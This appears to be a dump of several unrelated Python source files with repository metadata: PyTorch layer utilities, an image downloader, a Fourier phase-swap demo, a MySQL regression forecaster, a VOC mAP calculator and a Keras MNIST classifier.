        >>> # extract layer1 and layer3, giving as names `feat1` and feat2`
        >>> new_m = torchvision.models._utils.IntermediateLayerGetter(m,
        >>>     {'layer1': 'feat1', 'layer3': 'feat2'})
        >>> out = new_m(torch.rand(1, 3, 224, 224))
        >>> print([(k, v.shape) for k, v in out.items()])
        >>>     [('feat1', torch.Size([1, 64, 56, 56])),
        >>>      ('feat2', torch.Size([1, 256, 14, 14]))]
    """
    _version = 2
    __annotations__ = {
        "return_layers": Dict[str, str],
    }

    def __init__(self, model, return_layers):
        # every requested layer must be a *direct* child of the model
        if not set(return_layers).issubset([name for name, _ in model.named_children()]):
            raise ValueError("return_layers are not present in model")
        orig_return_layers = return_layers
        # work on a stringified copy; the original mapping is kept on self
        return_layers = {str(k): str(v) for k, v in return_layers.items()}
        layers = OrderedDict()
        for name, module in model.named_children():
            layers[name] = module
            if name in return_layers:
                del return_layers[name]
            if not return_layers:
                # stop copying children once the last requested layer is included
                break
        super(IntermediateLayerGetter, self).__init__(layers)
        self.return_layers = orig_return_layers

    def forward(self, x):
        # run the retained children in registration order, collecting the
        # requested intermediate outputs under their user-chosen names
        out = OrderedDict()
        for name, module in self.items():
            x = module(x)
            if name in self.return_layers:
                out_name = self.return_layers[name]
                out[out_name] = x
        return out
class SplitActivation(object):
    r"""Split a multi-task output tensor channel-wise and apply a
    per-task activation function to each chunk.

    Args:
        target_opt: list of target-option keys; each key determines the
            number of channels of its chunk (a ``'9-<k>'`` key encodes an
            explicit channel count ``k``).
        output_act: per-target activation names (required unless
            ``split_only=True``); must align with ``target_opt``.
        split_only: if True, only split the tensor without activations.
        do_cat: if True, concatenate the activated chunks back together.
        do_2d: if True, the ``'2'`` target uses 2 channels instead of 3.
        normalize: if True, tanh outputs are rescaled from [-1, 1] to [0, 1].
    """
    # number of channels of different target options (class-level defaults)
    num_channels_dict = {
        '0': 1,
        '1': 3,
        '2': 3,
        '3': 1,
        '4': 1,
        '5': 11,
        '6': 1,
    }

    def __init__(self,
                 target_opt: List[str] = ['0'],
                 output_act: Optional[List[str]] = None,
                 split_only: bool = False,
                 do_cat: bool = True,
                 do_2d: bool = False,
                 normalize: bool = False):
        if output_act is not None:
            assert len(target_opt) == len(output_act)

        # Bug fix: operate on a per-instance copy of the channel table.
        # Previously do_2d=True mutated the shared *class-level* dict in
        # place, silently changing the behavior of all later instances.
        self.num_channels_dict = dict(self.num_channels_dict)
        if do_2d:
            self.num_channels_dict['2'] = 2

        self.split_channels = []
        self.target_opt = target_opt
        self.do_cat = do_cat
        self.normalize = normalize
        for topt in self.target_opt:
            if topt[0] == '9':
                # '9-<k>' carries an explicit channel count
                channels = int(topt.split('-')[1])
                self.split_channels.append(channels)
            else:
                self.split_channels.append(
                    self.num_channels_dict[topt[0]])

        self.split_only = split_only
        if not self.split_only:
            # NOTE(review): output_act must be provided here; with the
            # default output_act=None this raises TypeError -- confirm
            # whether a default of ['none'] per target was intended.
            self.act = self._get_act(output_act)

    def __call__(self, x):
        """Split ``x`` along dim 1; optionally activate and re-concatenate."""
        chunks = list(torch.split(x, self.split_channels, dim=1))
        if self.split_only:
            return chunks

        chunks = [self._apply_act(self.act[i], chunks[i])
                  for i in range(len(chunks))]
        if self.do_cat:
            return torch.cat(chunks, dim=1)
        return chunks

    def _get_act(self, act):
        # resolve activation names to callables (fix: loop variable no
        # longer shadows the `act` argument)
        out = [None] * len(self.target_opt)
        for i, name in enumerate(act):
            out[i] = get_functional_act(name)
        return out

    def _apply_act(self, act_fn, x):
        x = act_fn(x)
        if self.normalize and act_fn == torch.tanh:
            # map the tanh range [-1, 1] onto [0, 1]
            x = (x + 1.0) / 2.0
        return x

    @classmethod
    def build_from_cfg(cls,
                       cfg,
                       do_cat: bool = True,
                       split_only: bool = False,
                       normalize: bool = False):
        """Construct from a YACS-style config object."""
        return cls(cfg.MODEL.TARGET_OPT,
                   cfg.INFERENCE.OUTPUT_ACT,
                   split_only=split_only,
                   do_cat=do_cat,
                   do_2d=cfg.DATASET.DO_2D,
                   normalize=normalize)
# ------------------
# Swish Activation
# ------------------
# An ordinary implementation of Swish function
class Swish(nn.Module):
    """Swish activation, ``x * sigmoid(x)`` (plain, memory-hungry form)."""

    def forward(self, x):
        return torch.sigmoid(x) * x
# A memory-efficient implementation of Swish function
class SwishImplementation(torch.autograd.Function):
    """Memory-efficient Swish: recomputes sigmoid in backward instead of
    retaining the forward activation."""

    @staticmethod
    def forward(ctx, i):
        """Return ``i * sigmoid(i)`` and stash the input for backward."""
        result = i * torch.sigmoid(i)
        ctx.save_for_backward(i)
        return result

    @staticmethod
    def backward(ctx, grad_output):
        """Gradient of Swish: ``sigmoid(i) * (1 + i * (1 - sigmoid(i)))``."""
        # Fix: ctx.saved_variables is long-deprecated; saved_tensors is the
        # supported accessor for tensors stashed with save_for_backward.
        i, = ctx.saved_tensors
        sigmoid_i = torch.sigmoid(i)
        return grad_output * (sigmoid_i * (1 + i * (1 - sigmoid_i)))
class MemoryEfficientSwish(nn.Module):
    """Module wrapper around the custom-autograd Swish implementation."""

    def forward(self, x):
        # delegates to the memory-efficient autograd Function defined above
        return SwishImplementation.apply(x)
# --------------------
# Activation Layers
# --------------------
def get_activation(activation: str = 'relu') -> nn.Module:
    """Get the specified activation layer.

    Args:
        activation (str): one of ``'relu'``, ``'leaky_relu'``, ``'elu'``, ``'gelu'``,
            ``'swish'``, 'efficient_swish'`` and ``'none'``. Default: ``'relu'``

    Returns:
        nn.Module: a freshly constructed activation module.
    """
    assert activation in ["relu", "leaky_relu", "elu", "gelu",
                          "swish", "efficient_swish", "none"], \
        "Get unknown activation key {}".format(activation)
    # Factories defer construction: previously every activation module was
    # instantiated on each call just to return one of them.
    factories = {
        "relu": lambda: nn.ReLU(inplace=True),
        "leaky_relu": lambda: nn.LeakyReLU(negative_slope=0.2, inplace=True),
        "elu": lambda: nn.ELU(alpha=1.0, inplace=True),
        "gelu": lambda: nn.GELU(),
        "swish": lambda: Swish(),
        "efficient_swish": lambda: MemoryEfficientSwish(),
        "none": lambda: nn.Identity(),
    }
    return factories[activation]()
def get_functional_act(activation: str = 'relu'):
    """Get the specified activation function (a callable, not a module).

    Args:
        activation (str): one of ``'relu'``, ``'tanh'``, ``'elu'``, ``'sigmoid'``,
            ``'softmax'`` and ``'none'``. Default: ``'sigmoid'``
    """
    assert activation in ["relu", "tanh", "elu", "sigmoid", "softmax", "none"], \
        "Get unknown activation_fn key {}".format(activation)
    # note: 'relu' and 'elu' map to the *in-place* functional variants
    table = {
        'relu': F.relu_,
        'tanh': torch.tanh,
        'elu': F.elu_,
        'sigmoid': torch.sigmoid,
        'softmax': lambda x: F.softmax(x, dim=1),
        'none': lambda x: x,
    }
    return table[activation]
# ----------------------
# Normalization Layers
# ----------------------
def get_norm_3d(norm: str, out_channels: int, bn_momentum: float = 0.1) -> nn.Module:
    """Get the specified normalization layer for a 3D model.

    Args:
        norm (str): one of ``'bn'``, ``'sync_bn'`` ``'in'``, ``'gn'`` or ``'none'``.
        out_channels (int): channel number.
        bn_momentum (float): the momentum of normalization layers.

    Returns:
        nn.Module: the normalization layer
    """
    assert norm in ["bn", "sync_bn", "gn", "in", "none"], \
        "Get unknown normalization layer key {}".format(norm)
    layer_cls = {
        "bn": nn.BatchNorm3d,
        "sync_bn": nn.BatchNorm3d,
        "in": nn.InstanceNorm3d,
        "gn": lambda channels: nn.GroupNorm(8, channels),
        "none": nn.Identity,
    }[norm]
    # Bug fix: the membership test must use the *key* string. Previously
    # `norm` was rebound to the layer class first, so `norm in ["bn", ...]`
    # was always False and bn_momentum was silently ignored.
    if norm in ["bn", "sync_bn", "in"]:
        return layer_cls(out_channels, momentum=bn_momentum)
    return layer_cls(out_channels)
def get_norm_2d(norm: str, out_channels: int, bn_momentum: float = 0.1) -> nn.Module:
    """Get the specified normalization layer for a 2D model.

    Args:
        norm (str): one of ``'bn'``, ``'sync_bn'`` ``'in'``, ``'gn'`` or ``'none'``.
        out_channels (int): channel number.
        bn_momentum (float): the momentum of normalization layers.

    Returns:
        nn.Module: the normalization layer
    """
    assert norm in ["bn", "sync_bn", "gn", "in", "none"], \
        "Get unknown normalization layer key {}".format(norm)
    layer_cls = {
        "bn": nn.BatchNorm2d,
        "sync_bn": nn.BatchNorm2d,
        "in": nn.InstanceNorm2d,
        "gn": lambda channels: nn.GroupNorm(16, channels),
        "none": nn.Identity,
    }[norm]
    # Bug fix: compare the key string, not the layer class, so that
    # bn_momentum is actually applied to bn/sync_bn/in layers.
    if norm in ["bn", "sync_bn", "in"]:
        return layer_cls(out_channels, momentum=bn_momentum)
    return layer_cls(out_channels)
def get_norm_1d(norm: str, out_channels: int, bn_momentum: float = 0.1) -> nn.Module:
    """Get the specified normalization layer for a 1D model.

    Args:
        norm (str): one of ``'bn'``, ``'sync_bn'`` ``'in'``, ``'gn'`` or ``'none'``.
        out_channels (int): channel number.
        bn_momentum (float): the momentum of normalization layers.

    Returns:
        nn.Module: the normalization layer
    """
    assert norm in ["bn", "sync_bn", "gn", "in", "none"], \
        "Get unknown normalization layer key {}".format(norm)
    layer_cls = {
        "bn": nn.BatchNorm1d,
        "sync_bn": nn.BatchNorm1d,
        "in": nn.InstanceNorm1d,
        "gn": lambda channels: nn.GroupNorm(16, channels),
        "none": nn.Identity,
    }[norm]
    # Bug fix: compare the key string, not the layer class, so that
    # bn_momentum is actually applied to bn/sync_bn/in layers.
    if norm in ["bn", "sync_bn", "in"]:
        return layer_cls(out_channels, momentum=bn_momentum)
    return layer_cls(out_channels)
def get_num_params(model):
    """Return the total number of scalar parameters in *model*."""
    return sum(param.nelement() for param in model.parameters())
| true |
64a08de816cd8aee32b0b9ff9a0fb7c774a3b711 | Python | teemo927/python_ba | /wuhan_house_price/HttpDownloader.py | UTF-8 | 1,402 | 2.875 | 3 | [] | no_license | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import urllib.parse
import urllib.request
from urllib.error import URLError
from Proxy_Get import Proxy_Get
class HttpDownloader(object):
    """Fetch page content through a proxy and save images to disk."""

    def download(self, url):
        """Fetch *url* via Proxy_Get; return the response, or None for a None url."""
        if url is None:
            return None
        print(url)
        p = Proxy_Get()
        res = p.proxy_url(url)
        print(res)
        return res

    def load_imgs(self, title, img_urls):
        """Download every image in *img_urls* into a folder named after *title*."""
        if img_urls is None:
            return None
        for index, img_url in enumerate(img_urls):
            # Bug fix: arguments were previously passed as
            # (index, title, img_url), swapping the url and index
            # parameters of _get_path and producing broken target paths.
            path = self._get_path(img_url, title, index)
            self._load_img(img_url, path, index)

    def _get_path(self, url, title, index):
        """Build (and create the directory for) the local target path of one
        image; returns None on failure (the error is printed, best-effort).

        NOTE(review): Windows-style '\\' separators are hard-coded.
        """
        try:
            base = os.getcwd() + "\\py_downloads\\" + title + "\\"
            if os.path.exists(base) is False:
                os.makedirs(base)
            link = str(url)
            name = link.split('/')
            # prefix with the index to keep same-named images distinct
            path = base + str(index) + "_" + name[-1]
            if path.__contains__('&'):
                path = str(path).split('&')[-1]
            return path
        except Exception as e:
            print(e)

    def _load_img(self, img_url, path, index):
        """Download one image to *path*, logging progress; URL errors are printed."""
        try:
            urllib.request.urlretrieve(img_url, path)
            print(index, '、', img_url)
            print(index, '、', path)
        except URLError as e:
            print(e)
| true |
4e8062049cc23b5c14d3e9b91ff6bb64db231491 | Python | ferakon/2D_Fourier_Phase_Swap | /phase_swap_2D.py | UTF-8 | 1,074 | 3.046875 | 3 | [
"Apache-2.0"
] | permissive | #import packages
import numpy as np
import matplotlib.pyplot as plt
#read single channel images
img_1 = plt.imread("cameraman.tif")
img_2 = plt.imread("cameraman_flip.tif")
#apply 2D Fourier transform
ft_1 = np.fft.fft2(img_1)
ft_2 = np.fft.fft2(img_2)
#swap image phase responses
out_1 = np.abs(ft_1) * np.exp(np.dot(1j,np.angle(ft_2)));
out_2 = np.abs(ft_2) * np.exp(np.dot(1j,np.angle(ft_1)));
#perform inverse 2D Fourier transform and take the real part
out_1 = np.real(np.fft.ifft2(out_1))
out_2 = np.real(np.fft.ifft2(out_2))
#create a figure and plot the comparative images
plt.figure(1)
plt.subplot(221)
plt.axis('off')
plt.title('Original image #1')
plt.imshow(img_1, cmap='gray')
plt.subplot(222)
plt.axis('off')
plt.title('Magnitude of #1, phase of #2')
plt.imshow(out_1, cmap='gray')
plt.subplot(223)
plt.axis('off')
plt.title('Original image #2')
plt.imshow(img_2, cmap='gray')
plt.subplot(224)
plt.axis('off')
plt.title('Magnitude of #2, phase of #1')
plt.imshow(out_2, cmap='gray')
plt.show()
| true |
771477839905adfbcdbb2c23540fc530bf29115b | Python | santoshbegur/kigyan | /SpringBootCpgApp/src/main/resources/static/assets/LinearRegression.py | UTF-8 | 3,578 | 2.625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Sat Apr 20 16:19:14 2019
@author: Santosh
"""
from pandas import read_csv
from pandas import DataFrame,datetime
from matplotlib import pyplot
from statsmodels.tsa.arima_model import ARIMA
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error
import mysql.connector
import pandas as pa
from mysql.connector import Error
import numpy as np
try:
    # Connect to MySQL database
    # NOTE(review): credentials are hard-coded in source -- move to config/env.
    connection = mysql.connector.connect(host='localhost',
                                         database='upcdatamodel',
                                         user='root',
                                         password='admin@kigyan')
    if connection.is_connected():
        cursor=connection.cursor()
        sql_select_Query = "select distinct store_id from transaction_summary where store_id in (1,2,3,4)"
        cursor.execute(sql_select_Query)
        records = cursor.fetchall()
        # for each store x product pair, fit y = b0 + b1*x by least squares
        for row in records:
            store = row[0]
            print("store:",store)
            sql_select_Query1 = "select distinct l3_id from transaction_summary where l3_id in (100037,100038,100003,100104)"
            cursor.execute(sql_select_Query1)
            records1 = cursor.fetchall()
            for row in records1:
                prod = row[0]
                print ("Product:" ,prod)
                sql_select_Query2 = "select s_week_id, sum(qty) from transaction_summary where store_id = %s and l3_id = %s group by s_week_id "
                cursor.execute(sql_select_Query2,(store,prod))
                records2 = cursor.fetchall()
                df = DataFrame(records2)
                #print (df.shape)
                #df.head()
                X = df[0].values
                Y = df[1].values
                m = len(X)
                #mean_x = np.mean(X)
                # NOTE(review): mean_x is hard-coded to 36 instead of np.mean(X)
                # -- confirm this is a deliberate choice and not a leftover.
                mean_x = 36
                mean_y = np.mean(Y)
                print("x :" ,mean_x, "Y:" ,mean_y)
                numer = 0
                denom = 0
                for i in range(m):
                    numer += (X[i] - mean_x) * (Y[i] - mean_y)
                    denom += (X[i] - mean_x) ** 2
                b1 = numer / denom
                b0 = mean_y - (b1 * mean_x)
                print(b1,b0)
                n = 158
                # predict 158 weeks ahead and store each prediction
                for j in range(n):
                    y_pred = b0 + b1 * j
                    #rmse += (Y[j] - y_pred) ** 2
                    #rmse = np.sqrt(rmse/m)
                    try:
                        sql_select_Query_final = """ INSERT INTO `prediction`(`s_week_id`, `Week_id`, `store_id`, `l3_id`,`qty`) VALUES (%s,%s,%s,%s,%s)"""
                        sql_update_s_week_id = """ update prediction p inner join week_master w set p.week_id=w.week_id where p.s_week_id=w.s_id"""
                        # NOTE(review): `i` here is the leftover index of the
                        # fitting loop above (always m-1), not the week -- bug?
                        insert_tuple = (j+1,i,store,prod,y_pred)
                        result = cursor.execute(sql_select_Query_final, insert_tuple)
                        update = cursor.execute(sql_update_s_week_id)
                        connection.commit()
                        print ("Record inserted successfully: ",insert_tuple)
                    except mysql.connector.Error as error:
                        connection.rollback()
                        print("Failed to insert into MySQL table {}".format(error))
except Error as e :
    print ("Error while connecting to MySQL", e)
finally:
    #closing database connection.
    if(connection.is_connected()):
        cursor.close()
        connection.close()
        print("MySQL connection is closed")
8631c9a594aca9e49d70b4ad1b62caeee9eed2ff | Python | BruceDai003/tools | /cann-benchmark_infer_scripts/scripts/map_calculate.py | UTF-8 | 13,946 | 3.25 | 3 | [
"Apache-2.0"
] | permissive | """
Copyright 2020 Huawei Technologies Co., Ltd
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Typical usage example:
"""
import glob
import os
import sys
import argparse
import collections
"""
0,0 ------> x (width)
|
| (Left,Top)
| *_________
| | |
| |
y |_________|
(height) *
(Right,Bottom)
"""
MINOVERLAP = 0.5 # IoU threshold for a true positive (defined in the PASCAL VOC2012 challenge)
top_margin = 0.15 # in percentage of the figure height
bottom_margin = 0.05 # in percentage of the figure height
def file_lines_to_list(path):
    """Read the text file at *path* and return its lines with surrounding
    whitespace (including the trailing newline) stripped."""
    with open(path) as handle:
        return [line.strip() for line in handle]
def voc_ap(recall, precision):
    """
    Calculate the AP given the recall and precision arrays
        1) Compute a version of the measured precision/recall curve with
           precision monotonically decreasing.
        2) Compute the AP as the area under this curve by numerical
           integration (official VOC2012 matlab procedure).

    Returns:
        (ap, m_recall, m_precision): the scalar AP plus the padded,
        monotonicity-adjusted recall/precision curves.

    Fix: the caller's *recall* and *precision* lists are no longer mutated
    in place (the old code inserted/appended sentinels into the arguments).
    """
    # pad with the VOC sentinels without touching the input lists
    m_recall = [0.0] + list(recall) + [1.0]
    m_precision = [0.0] + list(precision) + [0.0]
    # make precision monotonically non-increasing, right to left
    # (matlab: m_precision(i) = max(m_precision(i), m_precision(i+1)))
    for i in range(len(m_precision) - 2, -1, -1):
        m_precision[i] = max(m_precision[i], m_precision[i + 1])
    # indexes where recall changes
    # (matlab: i = find(m_recall(2:end) ~= m_recall(1:end-1)) + 1)
    i_list = [i for i in range(1, len(m_recall)) if m_recall[i] != m_recall[i - 1]]
    # AP = area under the curve
    # (matlab: ap = sum((m_recall(i) - m_recall(i-1)) .* m_precision(i)))
    ap = 0.0
    for i in i_list:
        ap += ((m_recall[i] - m_recall[i - 1]) * m_precision[i])
    return ap, m_recall, m_precision
def is_float_between_0_and_1(value):
    """Return True when *value* parses as a float strictly between 0 and 1."""
    try:
        return 0.0 < float(value) < 1.0
    except ValueError:
        return False
def error(msg):
    """Report *msg* on stdout, then terminate the program (exit status 0)."""
    print(msg)
    raise SystemExit(0)
def check_args(args):
    """Validate the parsed CLI arguments in place and return them.

    Exits (via ``error``) when either input path does not exist, and
    normalises ``args.ignore`` to an empty list when it was not supplied.
    """
    if not os.path.exists(args.label_path):
        error("annotation file:{} does not exist.".format(args.label_path))
    if not os.path.exists(args.npu_txt_path):
        error("txt path:{} does not exist.".format(args.npu_txt_path))
    if args.ignore is None:
        args.ignore = []
    return args
def parse_line(txt_file, lines_list, bounding_boxes, counter_per_class, already_seen_classes):
    """Parse ground-truth annotation lines into bounding-box records.

    Appends one record per line to *bounding_boxes*, bumps the per-class
    counters, and tracks first-seen classes. Classes listed in the
    module-level ``args.ignore`` are skipped; a malformed line terminates
    the program via ``error``.

    :return: (bounding_boxes, counter_per_class)
    """
    for line in lines_list:
        try:
            class_name, left, top, right, bottom = line.split()
        except ValueError:
            error_msg = "Error: File " + txt_file + " in the wrong format.\n"
            error_msg += " Expected: <class_name> <l> <t> <r> <b>\n"
            error_msg += " Received: " + line
            error(error_msg)
        if class_name in args.ignore:
            continue
        bounding_boxes.append({
            "class_name": class_name,
            "bbox": " ".join((left, top, right, bottom)),
            "used": False,
        })
        counter_per_class[class_name] += 1
        if class_name not in already_seen_classes:
            already_seen_classes.append(class_name)
    return bounding_boxes, counter_per_class
def get_label_list(file_path):
""" get label list via file paths
:param file_path: label file path
:return: ret
map , include file_bbox, classes, n_classes, counter_per_class
"""
files_list = glob.glob(file_path + '/*.txt')
if len(files_list) == 0:
error("Error: No ground-truth files found!")
files_list.sort()
# dictionary with counter per class
counter_per_class = collections.defaultdict(int)
file_bbox = {}
for txt_file in files_list:
file_id = txt_file.split(".txt", 1)[0]
file_id = os.path.basename(os.path.normpath(file_id))
# check if there is a correspondent detection-results file
temp_path = os.path.join(file_path, (file_id + ".txt"))
if not os.path.exists(temp_path):
error_msg = "Error. File not found: {}\n".format(temp_path)
error(error_msg)
lines_list = file_lines_to_list(txt_file)
# create ground-truth dictionary
bounding_boxes = []
already_seen_classes = []
boxes, counter_per_class = parse_line(txt_file, lines_list, bounding_boxes, counter_per_class,
already_seen_classes)
file_bbox[file_id] = boxes
classes = list(counter_per_class.keys())
# let's sort the classes alphabetically
classes = sorted(classes)
n_classes = len(classes)
ret = dict()
ret['file_bbox'] = file_bbox
ret['classes'] = classes
ret['n_classes'] = n_classes
ret['counter_per_class'] = counter_per_class
return ret
def get_predict_list(file_path, gt_classes):
""" get predict list with file paths and class names
:param file_path: predict txt file path
:param gt_classes: class information
:return: class_bbox bbox of every class
"""
dr_files_list = glob.glob(file_path + '/*.txt')
dr_files_list.sort()
class_bbox = {}
for class_index, class_name in enumerate(gt_classes):
bounding_boxes = []
for txt_file in dr_files_list:
# the first time it checks
# if all the corresponding ground-truth files exist
file_id = txt_file.split(".txt", 1)[0]
file_id = os.path.basename(os.path.normpath(file_id))
lines = file_lines_to_list(txt_file)
for line in lines:
try:
sl = line.split()
tmp_class_name, confidence, left, top, right, bottom = sl
if float(confidence) < float(args.threshold):
continue
except ValueError:
error_msg = "Error: File " + txt_file + " wrong format.\n"
error_msg += " Expected: <classname> <conf> <l> <t> <r> <b>\n"
error_msg += " Received: " + line
error(error_msg)
if tmp_class_name == class_name:
bbox = left + " " + top + " " + right + " " + bottom
bounding_boxes.append({"confidence": confidence, "file_id": file_id, "bbox": bbox})
# sort detection-results by decreasing confidence
bounding_boxes.sort(key=lambda x: float(x['confidence']), reverse=True)
class_bbox[class_name] = bounding_boxes
return class_bbox
def calculate_PR(sum_AP, fp, tp, counter_per_class, class_name):
"""
@description: calculate PR
@param sum_AP
@param fp
@param tp
@param counter_per_class
@param class_name
@return ret
map, include sum_AP, text, prec, rec
"""
cumsum = 0
for idx, val in enumerate(fp):
fp[idx] += cumsum
cumsum += val
cumsum = 0
for idx, val in enumerate(tp):
tp[idx] += cumsum
cumsum += val
rec = tp[:]
for idx, val in enumerate(tp):
rec[idx] = float(tp[idx]) / counter_per_class[class_name]
prec = tp[:]
for idx, val in enumerate(tp):
prec[idx] = float(tp[idx]) / (fp[idx] + tp[idx])
ap, mrec, mprec = voc_ap(rec[:], prec[:])
sum_AP += ap
# class_name + " AP = {0:.2f}%".format(ap * 100)
text = "{0:.2f}%".format(ap * 100) + " = " + class_name + " AP "
ret = dict()
ret['sum_AP'] = sum_AP
ret['text'] = text
ret['prec'] = prec
ret['rec'] = rec
return ret
def calculate_AP(output_file, gt_classes, labels, class_bbox, counter_per_class):
"""
Calculate the AP for each class
:param output_file:
:param gt_classes: [80]
:param labels: {file_index:[{"class_name": class_name, "bbox": bbox, "used": False}]}
:param class_bbox: {class_name:[{"confidence": confidence,
"file_id": file_id, "bbox": bbox}]}
:return:
"""
sum_AP = 0.0
writer = open(output_file, 'w')
writer.write("# AP and precision/recall per class\n")
count_true_positives = {}
n_classes = len(gt_classes)
for class_index, class_name in enumerate(gt_classes):
count_true_positives[class_name] = 0
"""
Load detection-results of that class
Assign detection-results to ground-truth objects
"""
dr_data = class_bbox[class_name]
nd = len(dr_data)
tp = [0] * nd # creates an array of zeros of size nd
fp = [0] * nd
for idx, detection in enumerate(dr_data):
file_id = detection["file_id"]
ground_truth_data = labels[file_id]
ovmax = -1
gt_match = -1
# load detected object bounding-box
bb = [float(x) for x in detection["bbox"].split()]
for obj in ground_truth_data:
# look for a class_name match
if obj["class_name"] == class_name:
bbgt = [float(x) for x in obj["bbox"].split()]
bi = [max(bb[0], bbgt[0]), max(bb[1], bbgt[1]),
min(bb[2], bbgt[2]), min(bb[3], bbgt[3])]
iw = bi[2] - bi[0] + 1
ih = bi[3] - bi[1] + 1
if iw > 0 and ih > 0:
# compute overlap (IoU)
ua = (bb[2] - bb[0] + 1) * (bb[3] - bb[1] + 1) + \
(bbgt[2] - bbgt[0] + 1) * \
(bbgt[3] - bbgt[1] + 1) - iw * ih
ov = iw * ih / ua
if ov > ovmax:
ovmax = ov
gt_match = obj
# set minimum overlap
min_overlap = MINOVERLAP
if ovmax >= min_overlap:
if "difficult" not in gt_match:
if not bool(gt_match["used"]):
# true positive
tp[idx] = 1
gt_match["used"] = True
count_true_positives[class_name] += 1
else:
# false positive (multiple detection)
fp[idx] = 1
else:
# false positive
fp[idx] = 1
# compute precision / recall
ret = calculate_PR(sum_AP, fp, tp, counter_per_class, class_name)
sum_AP = ret['sum_AP']
text = ret['text']
prec = ret['prec']
rec = ret['rec']
print(text)
rounded_prec = ['%.2f' % elem for elem in prec]
rounded_rec = ['%.2f' % elem for elem in rec]
writer.write(text + "\n Precision: " + str(rounded_prec) +
"\n Recall :" + str(rounded_rec) + "\n\n")
writer.write("\n# mAP of all classes\n")
mAP = sum_AP / n_classes
text = "mAP = {0:.2f}%".format(mAP * 100)
writer.write(text + "\n")
print(text)
if __name__ == '__main__':
parser = argparse.ArgumentParser('mAP calculate')
parser.add_argument('-i', '--ignore', nargs='+', type=str,
help="ignore a list of classes.")
parser.add_argument('--label_path', default="./ground-truth", help='the path of the label files')
parser.add_argument('--npu_txt_path', default="./detection-results", help='the path of the predict result')
parser.add_argument('--output_file', default="./output.txt", help='save result file')
parser.add_argument('--threshold', default=0, help='threshold of the object score')
args = parser.parse_args()
args = check_args(args)
ret = get_label_list(args.label_path)
gt_file_bbox = ret['file_bbox']
gt_classes = ret['classes']
gt_n_classes = ret['n_classes']
counter_per_class = ret['counter_per_class']
class_bbox = get_predict_list(args.npu_txt_path, gt_classes)
calculate_AP(args.output_file, gt_classes, gt_file_bbox, class_bbox, counter_per_class)
| true |
c67ba94915ece9fd5c6c7928349629943b16797e | Python | Longfei-Zhao/ENGN4528 | /ENGN4528_codes/ENGN4528_CLAB4/4528_Clab4/mnist_cnn.py | UTF-8 | 4,211 | 2.546875 | 3 | [] | no_license | '''Trains a simple convnet on the MNIST dataset.
Gets to 99.25% test accuracy after 12 epochs
(there is still a lot of margin for parameter tuning).
16 seconds per epoch on a GRID K520 GPU.
'''
from __future__ import print_function
import keras
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras.models import load_model
import numpy as np
#const
num_classes = 10
epochs = 60
pool_size = 2
train_patience = 6
model_name = 'cnn.h5'
save_data = 'adadelta.npz'
kernel_size = 3
batch_size = 150
lr = 0.1
hidden_layers = 128
Dropout_rate = 0.4
filter1 = 32
filter2 = 64
class LossHistory(keras.callbacks.Callback):
def on_train_begin(self, logs={}):
self.losses = {'batch':[], 'epoch':[]}
self.accuracy = {'batch':[], 'epoch':[]}
self.val_loss = {'batch':[], 'epoch':[]}
self.val_acc = {'batch':[], 'epoch':[]}
def on_batch_end(self, batch, logs={}):
self.losses['batch'].append(logs.get('loss'))
self.accuracy['batch'].append(logs.get('acc'))
self.val_loss['batch'].append(logs.get('val_loss'))
self.val_acc['batch'].append(logs.get('val_acc'))
def on_epoch_end(self, batch, logs={}):
self.losses['epoch'].append(logs.get('loss'))
self.accuracy['epoch'].append(logs.get('acc'))
self.val_loss['epoch'].append(logs.get('val_loss'))
self.val_acc['epoch'].append(logs.get('val_acc'))
def loss_save(self, file_name):
train_acc = np.array(self.accuracy['epoch'])
val_acc = np.array(self.val_acc['epoch'])
train_loss = np.array(self.losses['epoch'])
val_loss = np.array(self.val_loss['epoch'])
np.savez(file_name,train_acc = train_acc, train_loss = train_loss, val_acc = val_acc, val_loss = val_loss)
# input image dimensions
img_rows, img_cols = 28, 28
# the data, shuffled and split between train and test sets
data_file = np.load('mnist.npz')
x_train, y_train, x_test, y_test = data_file['x_train'],data_file['y_train'],data_file['x_test'],data_file['y_test']
if K.image_data_format() == 'channels_first':
x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)
x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)
input_shape = (1, img_rows, img_cols)
else:
x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)
x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)
input_shape = (img_rows, img_cols, 1)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
# convert class vectors to binary class matrices
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
model = Sequential()
model.add(Conv2D(filter1, kernel_size=(kernel_size, kernel_size),
activation='relu',
input_shape=input_shape))
model.add(Conv2D(filter2, (kernel_size, kernel_size), activation='relu'))
model.add(MaxPooling2D(pool_size=(pool_size, pool_size)))
model.add(Dropout(Dropout_rate))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(Dropout_rate))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
history = LossHistory()
callbacks = [
EarlyStopping(monitor='val_loss', patience=train_patience, verbose=0),
ModelCheckpoint(model_name, monitor='val_loss', save_best_only=True, verbose=0),
history,
]
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
validation_split = 0.2,
callbacks = callbacks)
model = load_model(model_name)
score = model.evaluate(x_test, y_test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
history.loss_save(save_data)
| true |
